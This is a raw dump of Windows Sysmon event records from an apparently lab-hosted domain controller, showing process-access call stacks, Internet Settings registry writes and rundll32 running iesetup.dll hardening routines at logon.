13:30:07.685{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+c029|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4754-6000-1905-000000009A01}21241644C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+bfb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b234|c:\windows\system32\appreadiness.dll+b81e|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.685{08A6967A-4754-6000-1905-000000009A01}21244760C:\Windows\System32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\appreadiness.dll+4dab3|c:\windows\system32\appreadiness.dll+c133|c:\windows\system32\appreadiness.dll+b167|c:\windows\system32\appreadiness.dll+b780|c:\windows\system32\appreadiness.dll+b725|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000010949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.670{08A6967A-4288-6000-1000-000000009A01}11361504C:\Windows\system32\svchost.exe{08A6967A-475F-6000-2405-000000009A01}3144C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.670{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-475F-6000-2405-000000009A01}3144C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.654{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3144C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.654{08A6967A-4754-6000-1705-000000009A01}34085068C:\Windows\Explorer.EXE{00000000-0000-0000-0000-000000000000}3144C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\SHELL32.dll+552284|C:\Windows\System32\SHELL32.dll+551ce0|C:\Windows\System32\SHELL32.dll+551e54|C:\Windows\System32\SHELL32.dll+234591|C:\Windows\System32\SHELL32.dll+110c45|C:\Windows\System32\SHELL32.dll+1234a1 154100x800000000000000010945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.659{08A6967A-475F-6000-2405-000000009A01}3144C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 13241300x800000000000000010944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:07.638{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000) 13241300x800000000000000010943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:07.638{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003) 13241300x800000000000000010942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:07.545{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000) 10341000x800000000000000010941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.185{08A6967A-4288-6000-1000-000000009A01}11361504C:\Windows\system32\svchost.exe{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.185{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.170{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.170{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.154{08A6967A-4754-6000-1705-000000009A01}34085068C:\Windows\Explorer.EXE{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\SHELL32.dll+552284|C:\Windows\System32\SHELL32.dll+551ce0|C:\Windows\System32\SHELL32.dll+551e54|C:\Windows\System32\SHELL32.dll+234591|C:\Windows\System32\SHELL32.dll+110c45|C:\Windows\System32\SHELL32.dll+1234a1 154100x800000000000000010933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:07.169{08A6967A-475F-6000-2305-000000009A01}3576C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.826{08A6967A-4754-6000-1705-000000009A01}34083980C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.826{08A6967A-4754-6000-1705-000000009A01}34083980C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.810{08A6967A-4754-6000-1705-000000009A01}34083980C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:08.810{08A6967A-4754-6000-1705-000000009A01}34083980C:\Windows\Explorer.EXE{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 